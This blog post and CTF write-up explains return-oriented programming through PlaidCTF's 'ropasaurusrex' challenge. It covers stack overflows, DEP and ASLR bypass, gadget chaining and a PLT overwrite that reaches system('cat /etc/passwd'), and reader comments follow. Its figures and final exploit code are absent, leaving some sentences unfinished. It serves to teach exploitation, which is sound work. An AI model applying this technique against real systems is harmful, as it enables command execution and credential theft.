ropasaurusrex: a primer on return-oriented programming

One of the worst feelings when playing a capture-the-flag challenge is the hindsight problem. You spend a few hours on a level—nothing like the amount of time I spent on cnot, not by a fraction—and realize that it was actually pretty easy. But also a brainfuck. That's what ROP's all about, after all!

Anyway, even though I spent a lot of time working on the wrong solution (specifically, I didn't think to bypass ASLR for quite awhile), the process we took of completing the level first without, then with ASLR, is actually a good way to show it, so I'll take the same route on this post.

Before I say anything else, I have to thank HikingPete for being my wingman on this one. Thanks to him, we solved this puzzle much more quickly and, for a short time, were in 3rd place worldwide!
Coincidentally, I've been meaning to write a post on ROP for some time now. I even wrote a vulnerable demo program that I was going to base this on! But, since PlaidCTF gave us this challenge, I thought I'd talk about it instead! This isn't just a writeup, this is designed to be a fairly in-depth primer on return-oriented programming! If you're more interested in the process of solving a CTF level, have a look at my writeup of cnot. :)

What the heck is ROP?

ROP—return-oriented programming—is a modern name for a classic exploit called "return into libc". The idea is that you found an overflow or other type of vulnerability in a program that lets you take control, but you have no reliable way get your code into executable memory (DEP, or data execution prevention, means that you can't run code from anywhere you want anymore).

With ROP, you can pick and choose pieces of code that are already in sections executable memory and followed by a 'return'. Sometimes those pieces are simple, and sometimes they're complicated. In this exercise, we only need the simple stuff, thankfully!

But, we're getting ahead of ourselves. Let's first learn a little more about the stack! I'm not going to spend a ton of time explaining the stack, so if this is unclear, please check out my assembly tutorial.

The stack

I'm sure you've heard of the stack before. Stack overflows? Smashing the stack? But what's it actually mean? If you already know, feel free to treat this as a quick primer, or to just skip right to the next section. Up to you!

The simple idea is, let's say function A() calls function B() with two parameters, 1 and 2. Then B() calls C() with two parameters, 3 and 4. When you're in C(), the stack looks like this:

This is quite a mouthful (eyeful?) if you don't live and breathe all the time at this depth, so let me explain a bit. Every time you call a function, a new "stack frame" is built. A "frame" is simply some memory that the function allocates for itself on the stack. In fact, it doesn't even allocate it, it just adds stuff to the end and updates the esp register so any functions it calls know where its own stack frame needs to start (esp, the stack pointer, is basically a variable).

This stack frame holds the context for the current function, and lets you easily a) build frames for new functions being called, and b) return to previous frames (i.e., return from functions). esp (the stack pointer) moves up and down, but always points to the top of the stack (the lowest address).

Have you ever wondered where a function's local variables go when you call another function (or, better yet, you call the same function again recursively)? Of course not! But if you did, now you'd know: they wind up in an old stack frame that we return to later!

Now, let's look at what's stored on the stack, in the order it gets pushed (note that, confusingly, you can draw a stack either way; in this document, the stack grows from top to bottom, so the older/callers are on top and the newer/callees are on the bottom):

Parameters: The parameters that were passed into the function by the caller—these are extremely important with ROP.

Return address: Every function needs to know where to go when it's done. When you call a function, the address of the instruction right after the call is pushed onto the stack prior to entering the new function. When you return, the address is popped off the stack and is jumped to. This is extremely important with ROP.

Saved frame pointer: Let's totally ignore this. Seriously. It's just something that compilers typically do, except when they don't, and we won't speak of it again.

Local variables: A function can allocate as much memory as it needs (within reason) to store local variables. They go here. They don't matter at all for ROP and can be safely ignored.

So, to summarize: when a function is called, parameters are pushed onto the stack, followed by the return address. When the function returns, it grabs the return address off the stack and jumps to it. The parameters pushed onto the stack are removed by the calling function, except when they're not. We're going to assume the caller cleans up, that is, the function doesn't clean up after itself, since that's is how it works in this challenge (and most of the time on Linux).

Heaven, hell, and stack frames

The main thing you have to understand to know ROP is this: a function's entire universe is its stack frame. The stack is its god, the parameters are its commandments, local variables are its sins, the saved frame pointer is its bible, and the return address is its heaven (okay, probably hell). It's all right there in the Book of Intel, chapter 3, verses 19 - 26 (note: it isn't actually, don't bother looking).

Let's say you call the sleep() function, and get to the first line; its stack frame is going to look like this:

When sleep() starts, this stack frame is all it sees. It can save a frame pointer (crap, I mentioned it twice since I promised not to; I swear I won't mention it again) and make room for local variables by subtracting the number of bytes it wants from esp (ie, making esp point to a lower address). It can call other functions, which create new frames under esp. It can do many different things; what matters is that, when it sleep() starts, the stack frame makes up its entire world.

And, of course, the caller, after sleep() returns, will remove "seconds" from the stack by adding 4 to esp (later on, we'll talk about how we have to use pop/pop/ret constructs to do the same thing).

In a properly working system, this is how life works. That's a safe assumption. The "seconds" value would only be on the stack if it was pushed, and the return address is going to point to the place it was called from. Duh. How else would it get there?

Controlling the stack

...well, since you asked, let me tell you. We've all heard of a "stack overflow", which involves overwriting a variable on the stack. What's that mean? Well, let's say we have a frame that looks like this:

The variable buf is 16 bytes long. What happens if a program tries to write to the 17th byte of buf (i.e., buf[16])? Well, it writes to the last byte—little endian—of the return address. The 18th byte writes to the second-last byte of the return address, and so on. Therefore, we can change the return address to point to anywhere we want. Anywhere we want. So when the function returns, where's it go? Well, it thinks it's going to where it's supposed to go—in a perfect world, it would be—but nope! In this case, it's going to wherever the attacker wants it to. If the attacker says to jump to 0, it jumps to 0 and crashes. If the attacker says to go to 0x41414141 ("AAAA"), it jumps there and probably crashes. If the attacker says to jump to the stack... well, that's where it gets more complicated...

DEP

Traditionally, an attacker would change the return address to point to the stack, since the attacker already has the ability to put code on the stack (after all, code is just a bunch of bytes!). But, being that it was such a common and easy way to exploit systems, those assholes at OS companies (just kidding, I love you guys :) ) put a stop to it by introducing data execution prevention, or DEP. On any DEP-enabled system, you can no longer run code on the stack—or, more generally, anywhere an attacker can write—instead, it crashes.

So how the hell do I run code without being allowed to run code!?

Well, we're going to get to that. But first, let's look at the vulnerability that the challenge uses!

If you want to do this "better" (by which I mean, slower), check out Metasploit's pattern_create.rb and pattern_offset.rb. They're great when guessing is a slow process, but for the purpose of this challenge it was so quick to guess and check that I didn't bother.

Starting to write an exploit

The first thing you should do is start running ropasaurusrex as a network service. The folks who wrote the CTF used xinetd to do this, but we're going to use netcat, which is just as good (for our purposes):

How to waste time with ASLR

I called this section 'wasting time', because I didn't realize—at the time—that ASLR was enabled. However, assuming no ASLR actually makes this a much more instructive puzzle. So for now, let's not worry about ASLR—in fact, let's not even define ASLR. That'll come up in the next section.

Okay, so what do we want to do? We have a vulnerable process, and we have the libc shared library. What's the next step?

Well, our ultimate goal is to run system commands. Because stdin and stdout are both hooked up to the socket, if we could run, for example, system("cat /etc/passwd"), we'd be set! Once we do that, we can run any command. But doing that involves two things:

Getting the string cat /etc/passwd into memory somewhere

Running the system() function

Getting the string into memory

Getting the string into memory actually involves two sub-steps:

Find some memory that we can write to

Find a function that can write to it

Tall order? Not really! First things first, let's find some memory that we can read and write! The most obvious place is the .data section:

Uh oh, .data is only 8 bytes long. That's not enough! In theory, any address that's long enough, writable, and not used will be enough for what we need. Looking at the output for objdump -x, I see a section called .dynamic that seems to fit the bill:

The .dynamic section holds information for dynamic linking. We don't need that for what we're going to do, so let's choose address 0x08049530 to overwrite.

The next step is to find a function that can write our command string to address 0x08049530. The most convenient functions to use are the ones that are in the executable itself, rather than a library, since the functions in the executable won't change from system to system. Let's look at what we have:

Running it

Now that we've written cat /etc/passwd into memory, we need to call system() and point it at that address. It turns out, if we assume ASLR is off, this is easy. We know that the executable is linked with libc:

At the moment that read() returns, the stack pointer is in the location shown above. When it returns, it pops read()'s return address off the stack and jumps to it. When it does, this is what the stack looks like when read() returns:

Uh oh, that's no good! The stack pointer is pointing to the middle of read()'s frame when we enter system(), not to the bottom of system()'s frame like we want it to! What do we do?

Well, when perform a ROP exploit, there's a very important construct we need called pop/pop/ret. In this case, it's actually pop/pop/pop/ret, which we'll call "pppr" for short. Just remember, it's enough "pops" to clear the stack, followed by a return.

pop/pop/pop/ret is a construct that we use to remove the stuff we don't want off the stack. Since read() has three arguments, we need to pop all three of them off the stack, then return. To demonstrate, here's what the stack looks like immediately after read() returns to a pop/pop/pop/ret:

What is ASLR?

ASLR—or address space layout randomization—is a defense implemented on all modern systems (except for FreeBSD) that randomizes the address that libraries are loaded at. As an example, let's run ropasaurusrex twice and get the address of system():

Notice that the address of system() changes from 0xb766e450 to 0xb76a7450. That's a problem!

Defeating ASLR

So, what do we know? Well, the binary itself isn't ASLRed, which means that we can rely on every address in it to stay put, which is useful. Most importantly, the relocation table will remain at the same address:

Well look at that.. a pointer to read() at a memory address that we know! What can we do with that, I wonder...? I'll give you a hint: we can use the write() function—which we also know—to grab data from arbitrary memory and write it to the socket.

Finally, running some code!

Okay, let's break, this down into steps. We need to:

Copy a command into memory using the read() function.

Get the address of the write() function using the write() function.

Calculate the offset between write() and system(), which lets us get the address of system().

Call system().

To call system(), we're gonna have to write the address of system() somewhere in memory, then call it. The easiest way to do that is to overwrite the call to read() in the .plt table, then call read().

By now, you're probably confused. Don't worry, I was too. I was shocked I got this working. :)

Let's just go for broke now and get this working! Here's the stack frame we want:

Let's start at the bottom and work our way up! I tagged each frame with a number for easy reference.

Frame [1] we've seen before. It writes cmd into our writable memory. Frame [2] is a standard pop/pop/pop/ret to clean up the read().

Frame [3] uses write() to write the address of the read() function to the socket. Frame [4] uses a standard pop/pop/pop/ret to clean up after write().

Frame [5] reads another address over the socket and writes it to memory. This address is going to be the address of the system() call. The reason writing it to memory works is because of how read() is called. Take a look at the read() call we've been using in gdb (0x0804832C) and you'll see this:

read() is actually implemented as an indirect jump! So if we can change what ds:0x804961c's value is, and still jump to it, then we can jump anywhere we want! So in frame [3] we read the address from memory (to get the actual address of read()) and in frame [5] we write a new address there.

Frame [6] is a standard pop/pop/pop/ret construct, with a small difference: the return address of the pop/pop/pop/ret is 0x804832c, which is actually read()'s .plt entry. Since we overwrote read()'s .plt entry with system(), this call actually goes to system()!

Final code

Whew! That's quite complicated. Here's code that implements the full exploit for ropasaurusrex, bypassing both DEP and ASLR:

18 thoughts on “ropasaurusrex: a primer on return-oriented programming”

I had a hard time following how you manipulated the read() call yourself... I think you should point out ( not in code comments) that you overflowed the return address to that of reads with it's expected parameters sitting in the buffer.

I have not been able to get the first part working, that is getting "cat /etc/passwd" at 0x08049530. Read saves the string on the stack but nothing at the location intended. Anybody else have this problem? Would appreciate any help.

The second parameter in read(int fd, void *buf, size_t count) takes in pointer to the address to write to as a parameter. In this example the author is trying to write "cat /etc/passwd" at the location ( 0x08049530) in ".dynamic" section but not to the stack itself.

Thank you for the article! Encouraged by it, I attempted the exploit on an ASLR-disabled, amd64 OS. The fact, that amd64 ABI uses the registers to pass the parameters, greatly simplified the job. It was fun searching for the gadgets and exciting to see the exploit work.